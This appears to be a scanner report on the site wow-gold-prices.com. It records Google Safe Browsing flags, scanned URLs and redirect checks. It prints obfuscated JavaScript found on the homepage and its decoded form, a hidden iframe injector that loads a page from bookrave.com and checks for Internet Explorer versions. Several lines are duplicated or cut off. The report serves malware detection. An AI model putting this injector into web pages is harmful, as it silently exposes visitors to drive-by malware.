Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wow-gold-prices.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.wow-gold-prices.com/ | 200 OK Content-Length: 7613 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ogH5(Zwvh, ZRa3, cYF6) { var NGQ0; NGQ0=Zwvh.split(ZRa3); var ULp4=NGQ0.join(cYF6); return ULp4; } function DhP1(QZqb) { QZqb = ogH5(QZqb,"##+##","'"); QZqb = ogH5(QZqb,"##|##","\\"); ULp4=""; Vmx4 =""; for(k=0;k<QZqb.length;k++) { ULp4 = QZqb.charCodeAt(k); if (ULp4==32){ULp4=35} else if (ULp4==35){ULp4=32} else if (ULp4==59){ULp4=64} else if (ULp4==64){ULp4=59} else if (ULp4==37){ULp4=42} else if (ULp4==42){ULp4=37} else if (ULp4>=97 && ULp4<=122) { ULp4=ULp4-97;ULp4= Decoded script: MqHG = 'http://bookrave.com/tmp/z/static.php';Kat7 = 'iframe'; MqHG = 'http://bookrave.com/tmp/z/static.php';Kat7 = 'iframe'; JVt7 = document.createElement(Kat7);JVt7.setAttribute('src', MqHG); JVt7 = document.createElement(Kat7);JVt7.setAttribute('src', MqHG); JVt7.setAttribute('width',0);JVt7.setAttribute('height',0);JVt7.setAttribute('border',0); JVt7.setAttribute('width',0);JVt7.setAttribute('height',0);JVt7.setAttribute('border',0); JVt7.setAttribute('style','wi JVt7.setAttribute('style','width: 0; height: 0; border: none;'); JVt7.setAttribute('style','display:none'); Nvt5=navigator.userAgent.toLowerCase(); JVt7.setAttribute('style','display:none'); Nvt5=navigator.userAgent.toLowerCase(); IzKj=Nvt5.indexOf('msie');Zpy6=Nvt5.indexOf('msie 8');Jby6=Nvt5.indexOf('nt 6'); IzKj=Nvt5.indexOf('msie');Zpy6=Nvt5.indexOf('msie 8');Jby6=Nvt5.indexOf('nt 6'); document.body.appendChild(JVt7); document.body.appendChild(JVt7); Antivirus reports:
| ||
http://ads.adbrite.com/mb/text_group.php?sid=238129&zs=3732385f3930 | 500 Can't connect to ads.adbrite.com:80 Content-Length: 190 Content-Type: text/plain | clean |
http://ads.adbrite.com/test404page.js | 500 Can't connect to ads.adbrite.com:80 Content-Length: 190 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wow-gold-prices.com
Result:
GET / HTTP/1.1
Host: wow-gold-prices.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: wow-gold-prices.com
Referer: http://www.google.com/search?q=wow-gold-prices.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wow-gold-prices.com
Referer: http://www.google.com/search?q=wow-gold-prices.com
Result:
The result is similar to the first query. There are no suspicious redirects found.